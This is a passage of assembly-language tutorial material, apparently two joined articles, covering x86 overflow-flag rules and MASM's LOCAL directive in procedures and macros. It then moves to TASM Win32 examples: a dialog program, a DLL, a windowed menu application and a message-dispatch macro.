30. How to determine OF?

Now let’s see the overflow flag OF, still with above two arithmetic calculations as this:

mov al, 255
sub al, 1      ; AL = FE  OF = 0

mov bl, 255
add bl, -1     ; BL = FE  OF = 0

Neither of them overflows, so OF = 0. There are two ways to determine OF: the logical rule and the hardware implementation.

Logic viewpoint: The overflow flag is only set, OF = 1, when

  • Two positive operands are added and their sum is negative
  • Two negative operands are added and their sum is positive

Interpreted as signed, 255 is -1 (FFh). The OF flag does not care whether ADD or SUB is used. Our two examples both effectively add -1 to -1 with the result -2. Thus, two negatives are added and the sum is still negative, so OF = 0.

Hardware implementation: For non-zero operands,

  • OF = (carry out of the MSB) XOR (carry into the MSB)

Looking at our calculation again:

   1111 1111
+  1111 1111
-------------
   1111 1110

The carry out of the MSB is 1 and the carry into the MSB is also 1, so OF = (1 XOR 1) = 0.

To practice more, the following test cases are worth working through for your understanding:
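A few representative 8-bit cases, chosen for illustration and easy to verify in a debugger:

mov al, 7Fh        ; +127
add al, 1          ; result 80h (-128): two positives give a negative, OF = 1

mov al, 80h        ; -128
add al, 0FFh       ; add -1: result 7Fh (+127): two negatives give a positive, OF = 1

mov al, 50h        ; +80
add al, 0D0h       ; add -48: result 20h (+32), no signed overflow, OF = 0 (CF = 1)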

Ambiguous «LOCAL» directive

As mentioned previously, the PTR operator has two usages, DWORD PTR and PTR DWORD. But MASM provides another confusing directive, LOCAL, whose meaning is ambiguous and depends on the context in which the same reserved word is used. The following is the specification from MSDN:

        LOCAL localname [[, localname]]…
LOCAL label [[ [count ] ]] [[:type]] [[, label [[ [count] ]] [[type]]]]…

  • In the first directive, within a macro, LOCAL defines labels that are unique to each instance of the macro.
  • In the second directive, within a procedure definition (PROC), LOCAL creates stack-based variables that exist for the duration of the procedure. The label may be a simple variable or an array containing count elements.

This specification is not clear enough on its own. In this section, I'll expose the essential difference between the two and show two examples using the LOCAL directive, one in a procedure and the other in a macro. For familiarity, both examples calculate the nth Fibonacci number, like the earlier FibonacciByMemory. The main points delivered here are:

  • The variables declared by LOCAL in a macro are NOT local to the macro. They are system generated global variables on the data segment to resolve redefinition.
  • The variables created by LOCAL in a procedure are really local variables allocated on the stack frame with the lifecycle only during the procedure.

For the basic concepts and implementations of the data segment and the stack frame, please consult a textbook or the MASM manual; they are worth several chapters and are not covered here.

31. When LOCAL is used in a procedure

The following is a procedure with a parameter n that calculates the nth Fibonacci number, returned in EAX. I let the loop counter ECX take over the parameter n. Please compare it with FibonacciByMemory. The logic is the same; the only difference is that it uses the local variables pre and cur here, instead of the global variables previous and current in FibonacciByMemory.

;------------------------------------------------------------
FibonacciByLocalVariable PROC USES ecx edx, n:DWORD 
; Receives: Input n
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
LOCAL pre, cur :DWORD

   mov   ecx,n
   mov   eax,1         
   mov   pre,0         
   mov   cur,0         
L1:
   add eax, pre      ; eax = current + previous     
   mov edx, cur 
   mov pre, edx
   mov cur, eax
 loop   L1

   ret
FibonacciByLocalVariable ENDP

The following is the code generated from the VS Disassembly window at runtime. As you can see, each line of assembly source is translated into machine code with the parameter n and two local variables created on the stack frame, referenced by EBP:

   231: ;------------------------------------------------------------
   232: FibonacciByLocalVariable PROC USES ecx edx, n:DWORD 
011713F4 55                   push        ebp  
011713F5 8B EC                mov         ebp,esp  
011713F7 83 C4 F8             add         esp,0FFFFFFF8h  
011713FA 51                   push        ecx  
011713FB 52                   push        edx  
   233: ; Receives: Input n
   234: ; Returns: EAX, nth Fibonacci number
   235: ;------------------------------------------------------------
   236: LOCAL pre, cur :DWORD
   237: 
   238:    mov   ecx,n
011713FC 8B 4D 08             mov         ecx,dword ptr [ebp+8]  
   239:    mov   eax,1         
011713FF B8 01 00 00 00       mov         eax,1  
   240:    mov   pre,0         
01171404 C7 45 FC 00 00 00 00 mov         dword ptr [ebp-4],0  
   241:    mov   cur,0         
0117140B C7 45 F8 00 00 00 00 mov         dword ptr [ebp-8],0  
   242: L1:
   243:    add eax,pre      ; eax = current + previous     
01171412 03 45 FC             add         eax,dword ptr [ebp-4]  
   244:    mov EDX, cur 
01171415 8B 55 F8             mov         edx,dword ptr [ebp-8]  
   245:    mov pre, EDX
01171418 89 55 FC             mov         dword ptr [ebp-4],edx  
   246:    mov cur, eax
0117141B 89 45 F8             mov         dword ptr [ebp-8],eax  
   247:    loop   L1
0117141E E2 F2                loop        01171412  
   248: 
   249:    ret
01171420 5A                   pop         edx  
01171421 59                   pop         ecx  
01171422 C9                   leave  
01171423 C2 04 00             ret         4  
   250: FibonacciByLocalVariable ENDP

When FibonacciByLocalVariable is running, the stack frame can be seen as below:

Obviously, the parameter n is at EBP+8. This

add esp, 0FFFFFFF8h

just means

sub esp, 08h

moving the stack pointer ESP down by eight bytes to create the two DWORDs pre and cur. Finally, the LEAVE instruction implicitly does

mov esp, ebp
pop ebp

which moves EBP back into ESP, releasing the local variables pre and cur. The argument n, at EBP+8, is then released by the STDCALL calling convention's

ret 4
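From the caller's side, a minimal sketch (assuming the PROC has been prototyped so that INVOKE is available):

INVOKE FibonacciByLocalVariable, 12   ; roughly: push 12 / call FibonacciByLocalVariable
; EAX now holds the 12th Fibonacci number; ret 4 already removed the argument from the stack.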

32. When LOCAL is used in a macro

For a macro implementation, I copy almost the same code from FibonacciByLocalVariable. Since there is no USES for a macro, I manually PUSH/POP ECX and EDX. Also, without a stack frame, I have to create the global variables mPre and mCur on the data segment. The macro mFibonacciByMacro can look like this:

;------------------------------------------------------------
mFibonacciByMacro MACRO n
; Receives: Input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
LOCAL mPre, mCur, mL
.data
   mPre DWORD ?
   mCur DWORD ?

.code
   push ecx
   push edx

   mov   ecx,n
   mov   eax,1         
   mov   mPre,0         
   mov   mCur,0         
mL:
   add  eax, mPre      ; eax = current + previous     
   mov  edx, mCur 
   mov  mPre, edx
   mov  mCur, eax
   loop   mL

   pop edx
   pop ecx
ENDM

If you just want to call mFibonacciByMacro once, for example

mFibonacciByMacro 12

You don’t need LOCAL here. Let’s simply comment it out:

; LOCAL mPre, mCur, mL

mFibonacciByMacro accepts the argument 12 and replaces n with 12. This works fine, as the following listing generated by MASM shows:

              mFibonacciByMacro 12
0000018C           1   .data
0000018C 00000000        1      mPre DWORD ?
00000190 00000000        1      mCur DWORD ?
00000000           1   .code
00000000  51           1      push ecx
00000001  52           1      push edx
00000002  B9 0000000C       1      mov   ecx,12
00000007  B8 00000001       1      mov   eax,1
0000000C  C7 05 0000018C R  1      mov   mPre,0
     00000000
00000016  C7 05 00000190 R  1      mov   mCur,0
     00000000
00000020           1   mL:
00000020  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous
00000026  8B 15 00000190 R  1      mov edx, mCur
0000002C  89 15 0000018C R  1      mov mPre, edx
00000032  A3 00000190 R     1      mov mCur, eax
00000037  E2 E7        1      loop   mL
00000039  5A           1      pop edx
0000003A  59           1      pop ecx

Nothing is changed from the original code except the substitution of 12. The variables mPre and mCur are explicitly visible. Now let's call it twice, like

mFibonacciByMacro 12
mFibonacciByMacro 13

This is still fine for the first mFibonacciByMacro 12, but the second call causes three redefinition errors while preprocessing mFibonacciByMacro 13. Not only the data labels, i.e., the variables mPre and mCur, but also the code label mL is reported. This is because in assembly code each label is actually a memory address, and a second instance of any of mPre, mCur, or mL should occupy new memory rather than redefining an already created one:

               mFibonacciByMacro 12
 0000018C           1   .data
 0000018C 00000000        1      mPre DWORD ?
 00000190 00000000        1      mCur DWORD ?
 00000000           1   .code
 00000000  51           1      push ecx
 00000001  52           1      push edx
 00000002  B9 0000000C       1      mov   ecx,12
 00000007  B8 00000001       1      mov   eax,1         
 0000000C  C7 05 0000018C R  1      mov   mPre,0         
      00000000
 00000016  C7 05 00000190 R  1      mov   mCur,0         
      00000000
 00000020           1   mL:
 00000020  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous     
 00000026  8B 15 00000190 R  1      mov edx, mCur 
 0000002C  89 15 0000018C R  1      mov mPre, edx
 00000032  A3 00000190 R     1      mov mCur, eax
 00000037  E2 E7        1      loop   mL
 00000039  5A           1      pop edx
 0000003A  59           1      pop ecx

               mFibonacciByMacro 13
 00000194           1   .data
              1      mPre DWORD ?
FibTest.32.asm(83) : error A2005:symbol redefinition : mPre
 mFibonacciByMacro(6): Macro Called From
  FibTest.32.asm(83): Main Line Code
              1      mCur DWORD ?
FibTest.32.asm(83) : error A2005:symbol redefinition : mCur
 mFibonacciByMacro(7): Macro Called From
  FibTest.32.asm(83): Main Line Code
 0000003B           1   .code
 0000003B  51           1      push ecx
 0000003C  52           1      push edx
 0000003D  B9 0000000D       1      mov   ecx,13
 00000042  B8 00000001       1      mov   eax,1         
 00000047  C7 05 0000018C R  1      mov   mPre,0         
      00000000
 00000051  C7 05 00000190 R  1      mov   mCur,0         
      00000000
              1   mL:
FibTest.32.asm(83) : error A2005:symbol redefinition : mL
 mFibonacciByMacro(17): Macro Called From
  FibTest.32.asm(83): Main Line Code
 0000005B  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous     
 00000061  8B 15 00000190 R  1      mov edx, mCur 
 00000067  89 15 0000018C R  1      mov mPre, edx
 0000006D  A3 00000190 R     1      mov mCur, eax
 00000072  E2 AC        1      loop   mL
 00000074  5A           1      pop edx
 00000075  59           1      pop ecx

To fix this, let's turn the LOCAL declaration back on:

LOCAL mPre, mCur, mL

Again running mFibonacciByMacro twice, with 12 and 13, it assembles fine this time and we have:

              mFibonacciByMacro 12
0000018C           1   .data
0000018C 00000000        1      ??0000 DWORD ?
00000190 00000000        1      ??0001 DWORD ?
00000000           1   .code
00000000  51           1      push ecx
00000001  52           1      push edx
00000002  B9 0000000C       1      mov   ecx,12
00000007  B8 00000001       1      mov   eax,1
0000000C  C7 05 0000018C R  1      mov   ??0000,0
     00000000
00000016  C7 05 00000190 R  1      mov   ??0001,0
     00000000
00000020           1   ??0002:
00000020  03 05 0000018C R  1      add  eax,??0000      ; eax = current + previous
00000026  8B 15 00000190 R  1      mov edx, ??0001
0000002C  89 15 0000018C R  1      mov ??0000, edx
00000032  A3 00000190 R     1      mov ??0001, eax
00000037  E2 E7        1      loop   ??0002
00000039  5A           1      pop edx
0000003A  59           1      pop ecx

              mFibonacciByMacro 13
00000194           1   .data
00000194 00000000        1      ??0003 DWORD ?
00000198 00000000        1      ??0004 DWORD ?
0000003B           1   .code
0000003B  51           1      push ecx
0000003C  52           1      push edx
0000003D  B9 0000000D       1      mov   ecx,13
00000042  B8 00000001       1      mov   eax,1
00000047  C7 05 00000194 R  1      mov   ??0003,0
     00000000
00000051  C7 05 00000198 R  1      mov   ??0004,0
     00000000
0000005B           1   ??0005:
0000005B  03 05 00000194 R  1      add  eax,??0003      ; eax = current + previous
00000061  8B 15 00000198 R  1      mov edx, ??0004
00000067  89 15 00000194 R  1      mov ??0003, edx
0000006D  A3 00000198 R     1      mov ??0004, eax
00000072  E2 E7        1      loop   ??0005
00000074  5A           1      pop edx
00000075  59           1      pop ecx

Now the label names mPre, mCur, and mL are no longer visible. Instead, for the first expansion, mFibonacciByMacro 12, the preprocessor generates three system labels ??0000, ??0001, and ??0002 for mPre, mCur, and mL. For the second expansion, mFibonacciByMacro 13, we find another three system-generated labels, ??0003, ??0004, and ??0005. In this way, MASM resolves the redefinition issue across multiple macro expansions. You must declare your labels with the LOCAL directive in a macro.

However, the name LOCAL is misleading, because the system-generated ??0000, ??0001, etc. are not limited to the macro's context. They are really global in scope. To verify this, I purposely initialize mPre and mCur to 2 and 3:

LOCAL mPre, mCur, mL
.data
   mPre DWORD 2
   mCur DWORD 3

Then simply try to retrieve the values from ??0000 and ??0001, even before the two mFibonacciByMacro calls, in code:

mov esi, ??0000
mov edi, ??0001

mFibonacciByMacro 12
mFibonacciByMacro 13

Perhaps to your surprise, when you set a breakpoint, you can enter &??0000 into the VS debug Address box just like a normal variable. As we can see, the ??0000 memory address is 0x0116518C with the DWORD values 2, 3, and so on. Such a ??0000 is allocated on the data segment together with the other, properly named variables, with the ASCII string shown beside it:

To summarize, the LOCAL directive declared in a macro prevents data/code labels from being redefined globally.

Further, as an interesting test question, consider the following repeated execution of mFibonacciByMacro, which works fine without a LOCAL directive in mFibonacciByMacro. Why?

mov ecx, 2
L1:
   mFibonacciByMacro 12
loop L1

Summary

I have talked about many miscellaneous features of assembly language programming. Most of them come from our class teaching and assignment discussions [1]. The basic practices are presented here as short code snippets for better understanding, without irrelevant details. The main purpose is to show ideas and methods specific to assembly language, where it is stronger than other languages.

As noted, I haven't given complete test code, which would require a programming environment with input and output. For an easy start, you can go to [2] to download the Irvine32 library and set up your MASM programming environment with Visual Studio, although you have to learn quite a bit in advance to prepare yourself. For example, the statement exit mentioned here in main is not an element of assembly language, but is defined there as INVOKE ExitProcess,0.

Assembly language is notable for its one-to-one correspondence between an instruction and its machine code, as shown in several listings here. Via assembly code, you can get closer to the heart of the machine, such as registers and memory. Assembly language programming still plays an important role in both academic study and industry development. I hope this article can serve as a useful reference for students and professionals alike.

Assembler & Win32

Unlike programming under DOS, where programs written in high-level languages (HLLs) bore little resemblance to their assembly counterparts, Win32 applications have much more in common. First of all, this is because operating system services in Windows are accessed by calling functions rather than interrupts, which was typical for DOS. There is no passing of parameters in registers when calling service functions and, accordingly, no multitude of result values returned in general-purpose registers and the flags register. Consequently, the calling conventions of the system service functions are easier to remember and use. On the other hand, in Win32 you cannot work with the hardware directly, something DOS programs were "guilty" of. In general, writing programs for Win32 has become considerably simpler, for the following reasons:

no startup code of the kind required by applications and dynamic libraries written for Windows 3.x;
a flexible memory addressing scheme: memory can be addressed through any general-purpose register; the "absence" of segment registers;
availability of large amounts of virtual memory;
a well-developed operating system service and an abundance of functions that ease application development;
a variety of readily available means for building the user interface (dialogs, menus, and so on).
A modern assembler, such as TASM 5.0 from Borland International Inc., has in turn developed features that were previously typical only of HLLs. These include macro definitions for procedure calls, the ability to declare procedure templates (prototype descriptions), and even object-oriented extensions. At the same time, assembler has kept such an excellent tool as user-defined macros, for which no HLL has a full equivalent.

All these factors allow us to consider assembler a self-sufficient tool for writing applications for the Win32 platforms (Windows NT and Windows 95). To illustrate this point, let's look at a simple example of an application that works with a dialog box.

Example 1. A program working with a dialog
The file containing the application source, dlg.asm
IDEAL
P586
RADIX 16
MODEL FLAT
%NOINCL
%NOLIST
include "winconst.inc" ; API Win32 consts
include "winptype.inc" ; API Win32 functions prototype
include "winprocs.inc" ; API Win32 function
include "resource.inc" ; resource consts
MAX_USER_NAME = 20
DataSeg
szAppName db 'Demo 1', 0
szHello db 'Hello, '
szUser db MAX_USER_NAME dup (0)
CodeSeg
Start: call GetModuleHandleA, 0
call DialogBoxParamA, eax, IDD_DIALOG, 0, offset DlgProc, 0
cmp eax,IDOK
jne bye
call MessageBoxA, 0, offset szHello, \
offset szAppName, \
MB_OK or MB_ICONINFORMATION
bye: call ExitProcess, 0
public stdcall DlgProc
proc DlgProc stdcall
arg @@hDlg :dword, @@iMsg :dword, @@wPar :dword, @@lPar :dword
mov eax,[@@iMsg]
cmp eax,WM_INITDIALOG
je @@init
cmp eax,WM_COMMAND
jne @@ret_false
mov eax,[@@wPar]
cmp eax,IDCANCEL
je @@cancel
cmp eax,IDOK
jne @@ret_false
call GetDlgItemTextA, [@@hDlg], IDR_NAME, \
offset szUser, MAX_USER_NAME
mov eax,IDOK
@@cancel: call EndDialog, [@@hDlg], eax
@@ret_false: xor eax,eax
ret
@@init: call GetDlgItem, [@@hDlg], IDR_NAME
call SetFocus, eax
jmp @@ret_false
endp DlgProc
end Start
The resource file dlg.rc

#include "resource.h"
IDD_DIALOG DIALOGEX 0, 0, 187, 95
STYLE DS_MODALFRAME | DS_3DLOOK | WS_POPUP | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_CLIENTEDGE
CAPTION "Dialog"
FONT 8, "MS Sans Serif"
BEGIN
DEFPUSHBUTTON "OK",IDOK,134,76,50,14
PUSHBUTTON "Cancel",IDCANCEL,73,76,50,14
LTEXT "Type your name",IDC_STATIC,4,36,52,8
EDITTEXT IDR_NAME,72,32,112,14,ES_AUTOHSCROLL
END
The remaining files for this example are given in Appendix 1.

Immediately after the Start label, the program calls the Win32 API function GetModuleHandle to obtain the handle of this module (this parameter is more often referred to as the handle of instance). Having obtained the handle, we invoke the dialog, created either by hand or with some resource-building tool. The program then checks the result of the dialog box. If the user left the dialog by pressing the OK button, the application shows a MessageBox with a greeting.

The dialog procedure handles the following messages. On dialog initialization (WM_INITDIALOG) it asks Windows to set the focus to the user-name input field. The WM_COMMAND message is handled as follows: the code of the pressed button is checked. If the OK button was pressed, the user's input is copied into the variable szUser; if the Cancel button was pressed, no copying is done. In either case the dialog-closing function EndDialog is called. The remaining messages in the WM_COMMAND group are simply ignored, letting Windows apply the default processing.

You can compare this program with a similar one written in an HLL; the difference in the source will be negligible. Those who wrote assembly applications for Windows 3.x will certainly note that the need for the complicated and bulky startup code is gone. The application now looks simpler and more natural.

Example 2. A dynamic-link library
Writing dynamic libraries for Win32 has also become much simpler compared to how it was done under Windows 3.x. There is no longer a need to insert startup code, and the use of four initialization/deinitialization events at the process and thread level seems logical.

Let's look at a simple example of a dynamic library containing a single function, which converts an integer into a string in hexadecimal notation. The file mylib.asm

Ideal
P586
Radix 16
Model flat
DLL_PROCESS_ATTACH = 1

extrn GetVersion: proc

DataSeg
hInst dd 0
OSVer dw 0

CodeSeg
proc libEntry stdcall
arg @@hInst :dword, @@rsn :dword, @@rsrv :dword
cmp [@@rsn],DLL_PROCESS_ATTACH
jne @@1
call GetVersion
mov [OSVer],ax
mov eax,[@@hInst]
mov [hInst],eax
@@1: mov eax,1
ret
endP libEntry

public stdcall Hex2Str
proc Hex2Str stdcall
arg @@num :dword, @@str :dword
uses ebx
mov eax,[@@num]
mov ebx,[@@str]
mov ecx,7
@@1: mov edx,eax
shr eax,4
and edx,0F
cmp edx,0A
jae @@2
add edx,'0'
jmp @@3
@@2: add edx,'A' - 0A
@@3: mov [byte ebx + ecx],dl
dec ecx
jns @@1
mov [byte ebx + 8],0
ret
endp Hex2Str

end libEntry
The remaining files needed for this example can be found in Appendix 2.

Brief comments on the dynamic library

The procedure libEntry is the entry point of the dynamic library; it does not need to be declared as exported, since the loader locates it itself. LibEntry can be called in four cases:

when the library is mapped into a process's address space (DLL_PROCESS_ATTACH);
when the library is first called from a thread (DLL_THREAD_ATTACH), for example through the LoadLibrary function;
when the library is detached by a thread (DLL_THREAD_DETACH);
when the library is unloaded from the process's address space (DLL_PROCESS_DETACH).
In our example only the first of these events, DLL_PROCESS_ATTACH, is handled. While handling it, the library queries the OS version and stores it, along with its own handle of instance.

The library contains only one exported function, which needs no particular explanation. You may, however, note how the converted values are written out. The addressing scheme using two general-purpose registers, ebx + ecx, is interesting: it lets us use the ecx register both as a counter and as part of the address at the same time.
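A minimal caller sketch in the same Ideal-mode style (hexBuf is a hypothetical buffer; it assumes Hex2Str has been imported and declared with a stdcall PROCTYPE, as the API functions are in Example 3 below):

DataSeg
hexBuf db 9 dup (0)                        ; 8 hex digits plus a terminating zero

CodeSeg
call Hex2Str, 0DEADBEEFh, offset hexBuf    ; hexBuf now holds 'DEADBEEF', 0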

Example 3. A windowed application
The file dmenu.asm

Ideal
P586
Radix 16
Model flat

struc WndClassEx
cbSize dd 0
style dd 0
lpfnWndProc dd 0
cbClsExtra dd 0
cbWndExtra dd 0
hInstance dd 0
hIcon dd 0
hCursor dd 0
hbrBackground dd 0
lpszMenuName dd 0
lpszClassName dd 0
hIconSm dd 0
ends WndClassEx

struc Point
x dd 0
y dd 0
ends Point

struc msgStruc
hwnd dd 0
message dd 0
wParam dd 0
lParam dd 0
time dd 0
pnt Point <>
ends msgStruc

MyMenu = 0065
ID_OPEN = 9C41
ID_SAVE = 9C42
ID_EXIT = 9C43

CS_HREDRAW = 0001
CS_VREDRAW = 0002
IDI_APPLICATION = 7F00
IDC_ARROW = 00007F00
COLOR_WINDOW = 5
WS_EX_WINDOWEDGE = 00000100
WS_EX_CLIENTEDGE = 00000200
WS_EX_OVERLAPPEDWINDOW = WS_EX_WINDOWEDGE OR WS_EX_CLIENTEDGE
WS_OVERLAPPED = 00000000
WS_CAPTION = 00C00000
WS_SYSMENU = 00080000
WS_THICKFRAME = 00040000
WS_MINIMIZEBOX = 00020000
WS_MAXIMIZEBOX = 00010000
WS_OVERLAPPEDWINDOW = WS_OVERLAPPED OR WS_CAPTION OR \
WS_SYSMENU OR WS_THICKFRAME OR \
WS_MINIMIZEBOX OR WS_MAXIMIZEBOX
CW_USEDEFAULT = 80000000
SW_SHOW = 5
WM_COMMAND = 0111
WM_DESTROY = 0002
WM_CLOSE = 0010
MB_OK = 0

PROCTYPE ptGetModuleHandle stdcall \
lpModuleName :dword

PROCTYPE ptLoadIcon stdcall \
hInstance :dword, \
lpIconName :dword

PROCTYPE ptLoadCursor stdcall \
hInstance :dword, \
lpCursorName :dword

PROCTYPE ptLoadMenu stdcall \
hInstance :dword, \
lpMenuName :dword

PROCTYPE ptRegisterClassEx stdcall \
lpwcx :dword

PROCTYPE ptCreateWindowEx stdcall \
dwExStyle :dword, \
lpClassName :dword, \
lpWindowName :dword, \
dwStyle :dword, \
x :dword, \
y :dword, \
nWidth :dword, \
nHeight :dword, \
hWndParent :dword, \
hMenu :dword, \
hInstance :dword, \
lpParam :dword

PROCTYPE ptShowWindow stdcall \
hWnd :dword, \
nCmdShow :dword

PROCTYPE ptUpdateWindow stdcall \
hWnd :dword

PROCTYPE ptGetMessage stdcall \
pMsg :dword, \
hWnd :dword, \
wMsgFilterMin :dword, \
wMsgFilterMax :dword

PROCTYPE ptTranslateMessage stdcall \
lpMsg :dword

PROCTYPE ptDispatchMessage stdcall \
pmsg :dword

PROCTYPE ptSetMenu stdcall \
hWnd :dword, \
hMenu :dword

PROCTYPE ptPostQuitMessage stdcall \
nExitCode :dword

PROCTYPE ptDefWindowProc stdcall \
hWnd :dword, \
Msg :dword, \
wParam :dword, \
lParam :dword

PROCTYPE ptSendMessage stdcall \
hWnd :dword, \
Msg :dword, \
wParam :dword, \
lParam :dword

PROCTYPE ptMessageBox stdcall \
hWnd :dword, \
lpText :dword, \
lpCaption :dword, \
uType :dword

PROCTYPE ptExitProcess stdcall \
exitCode :dword

extrn GetModuleHandleA :ptGetModuleHandle
extrn LoadIconA :ptLoadIcon
extrn LoadCursorA :ptLoadCursor
extrn RegisterClassExA :ptRegisterClassEx
extrn LoadMenuA :ptLoadMenu
extrn CreateWindowExA :ptCreateWindowEx
extrn ShowWindow :ptShowWindow
extrn UpdateWindow :ptUpdateWindow
extrn GetMessageA :ptGetMessage
extrn TranslateMessage :ptTranslateMessage
extrn DispatchMessageA :ptDispatchMessage
extrn SetMenu :ptSetMenu
extrn PostQuitMessage :ptPostQuitMessage
extrn DefWindowProcA :ptDefWindowProc
extrn SendMessageA :ptSendMessage
extrn MessageBoxA :ptMessageBox
extrn ExitProcess :ptExitProcess

UDataSeg
hInst dd ?
hWnd dd ?

IFNDEF VER1
hMenu dd ?
ENDIF

DataSeg
msg msgStruc <>
classTitle db 'Menu demo', 0
wndTitle db 'Demo program', 0
msg_open_txt db 'You selected open', 0
msg_open_tlt db 'Open box', 0
msg_save_txt db 'You selected save', 0
msg_save_tlt db 'Save box', 0

CodeSeg
Start: call GetModuleHandleA, 0 ; get hInstance
mov [hInst],eax

sub esp,SIZE WndClassEx ; allocate space on the stack
; fill in the WndClassEx structure
mov [(WndClassEx esp).cbSize],SIZE WndClassEx
mov [(WndClassEx esp).style],CS_HREDRAW or CS_VREDRAW
mov [(WndClassEx esp).lpfnWndProc],offset WndProc
mov [(WndClassEx esp).cbWndExtra],0
mov [(WndClassEx esp).cbClsExtra],0
mov [(WndClassEx esp).hInstance],eax
call LoadIconA, 0, IDI_APPLICATION
mov [(WndClassEx esp).hIcon],eax
call LoadCursorA, 0, IDC_ARROW
mov [(WndClassEx esp).hCursor],eax
mov [(WndClassEx esp).hbrBackground],COLOR_WINDOW
IFDEF VER1
mov [(WndClassEx esp).lpszMenuName],MyMenu
ELSE
mov [(WndClassEx esp).lpszMenuName],0
ENDIF
mov [(WndClassEx esp).lpszClassName],offset classTitle
mov [(WndClassEx esp).hIconSm],0
call RegisterClassExA, esp ; register the window class

add esp,SIZE WndClassEx ; restore the stack
; create the window

IFNDEF VER2
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \ extended window style
offset classTitle, \ pointer to registered class name
offset wndTitle, \ pointer to window name
WS_OVERLAPPEDWINDOW, \ window style
CW_USEDEFAULT, \ horizontal position of window
CW_USEDEFAULT, \ vertical position of window
CW_USEDEFAULT, \ window width
CW_USEDEFAULT, \ window height
0, \ handle to parent or owner window
0, \ handle to menu, or child-window
\ identifier
[hInst], \ handle to application instance
0 ; pointer to window-creation data
ELSE
call LoadMenuA, [hInst], MyMenu
mov [hMenu],eax
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \ extended window style
offset classTitle, \ pointer to registered class name
offset wndTitle, \ pointer to window name
WS_OVERLAPPEDWINDOW, \ window style
CW_USEDEFAULT, \ horizontal position of window
CW_USEDEFAULT, \ vertical position of window
CW_USEDEFAULT, \ window width
CW_USEDEFAULT, \ window height
0, \ handle to parent or owner window
eax, \ handle to menu, or child-window
\ identifier
[hInst], \ handle to application instance
0 ; pointer to window-creation data
ENDIF
mov [hWnd],eax
call ShowWindow, eax, SW_SHOW ; show window
call UpdateWindow, [hWnd] ; redraw window

IFDEF VER3
call LoadMenuA, [hInst], MyMenu
mov [hMenu],eax
call SetMenu, [hWnd], eax
ENDIF

msg_loop:
call GetMessageA, offset msg, 0, 0, 0
or ax,ax
jz exit
call TranslateMessage, offset msg
call DispatchMessageA, offset msg
jmp msg_loop
exit: call ExitProcess, 0

public stdcall WndProc
proc WndProc stdcall
arg @@hwnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
mov eax,[@@msg]
cmp eax,WM_COMMAND
je @@command
cmp eax,WM_DESTROY
jne @@default
call PostQuitMessage, 0
xor eax,eax
jmp @@ret
@@default:
call DefWindowProcA, [@@hwnd], [@@msg], [@@wPar], [@@lPar]
@@ret: ret
@@command:
mov eax,[@@wPar]
cmp eax,ID_OPEN
je @@open
cmp eax,ID_SAVE
je @@save
call SendMessageA, [@@hwnd], WM_CLOSE, 0, 0
xor eax,eax
jmp @@ret
@@open: mov eax, offset msg_open_txt
mov edx, offset msg_open_tlt
jmp @@mess
@@save: mov eax, offset msg_save_txt
mov edx, offset msg_save_tlt
@@mess: call MessageBoxA, 0, eax, edx, MB_OK
xor eax,eax
jmp @@ret
endp WndProc
end Start
Comments on the program
Here I primarily wanted to demonstrate the use of Win32 API function prototypes. Of course, they (along with the descriptions of Win32 API constants and structures) should be moved into separate include files, since you will most likely use them in other programs as well. Declaring function prototypes gives the compiler strict control over the number and type of parameters passed to the functions. This makes the programmer's life considerably easier, helping to avoid run-time errors, especially since some Win32 API functions take quite a large number of parameters.

The essence of this program is to demonstrate different ways of working with a window menu. The program can be compiled in three variants (versions) by passing the compiler the VER2 or VER3 switch (VER1 is used by default). In the first variant, the menu is defined at the window-class level, and all windows of this class have the same menu. In the second variant, the menu is specified when the window is created, as a parameter of CreateWindowEx; the window class has no menu, so each window of the class may have its own menu. Finally, in the third variant, the menu is loaded after the window has been created. This variant shows how to attach a menu to an already created window.

Conditional compilation directives make it possible to include all the variants in the text of one and the same program. This technique is convenient not only for demonstration but also for debugging. For example, when you need to add a new fragment of code to a program, you can apply it so as not to lose a working module. And, of course, conditional compilation directives are the most convenient way to test different solutions (algorithms) within a single module.

The use of stack frames and the filling of structures on the stack through the stack pointer register (esp) is of particular interest. This is exactly what is demonstrated when the WndClassEx structure is filled in. Allocating space on the stack (a frame) is done simply by moving esp: sub esp,SIZE WndClassEx

Now we can access the allocated memory using that same stack pointer register. When writing 16-bit applications we did not have this possibility. This technique can be used inside any procedure, or even at an arbitrary point in the program. The overhead of such an allocation is minimal; however, keep in mind that the stack size is limited, and placing large amounts of data on the stack is hardly advisable. For that, it is better to use heaps or virtual memory.

The rest of the program is fairly trivial and needs no further explanation. The topic of macro definitions may prove more interesting.

Macro definitions
I rarely had to work seriously on macro definitions when programming for DOS. In Win32 the situation is fundamentally different. Here, well-written macro definitions can not only make programs easier to read and understand, but genuinely make programmers' lives easier. The point is that in Win32, fragments of code are often repeated with only minor differences. The most illustrative example is the window and/or dialog procedure. In both cases we determine the kind of message and pass control to the piece of code responsible for handling the received message. If a program makes heavy use of dialog boxes, such repeated fragments badly clutter the program and make it hard to read. Using macro definitions in such situations is more than justified. The following definition can serve as a basis for a macro that dispatches incoming messages to their handlers.

An example of macro definitions

macro MessageVector message1, message2:REST
IFNB <message1>
dd message1
dd offset @@&message1

@@VecCount = @@VecCount + 1
MessageVector message2
ENDIF
endm MessageVector

macro WndMessages VecName, message1, message2:REST
@@VecCount = 0
DataSeg
label @@&VecName dword
MessageVector message1, message2
@@&VecName&Cnt = @@VecCount
CodeSeg
mov ecx,@@&VecName&Cnt

mov eax,[@@msg]
@@&VecName&_1: dec ecx
js @@default
cmp eax,[dword ecx * 8 + offset @@&VecName]
jne @@&VecName&_1
jmp [dword ecx + offset @@&VecName + 4]

@@default: call DefWindowProcA, [@@hWnd], [@@msg], [@@wPar], [@@lPar]
@@ret: ret
@@ret_false: xor eax,eax
jmp @@ret
@@ret_true: mov eax,-1
dec eax
jmp @@ret
endm WndMessages
Comments on the macro definitions
When writing a window procedure you can use the WndMessages macro, listing in its parameters the messages you intend to handle. The window procedure then takes the form:

proc WndProc stdcall
arg @@hWnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
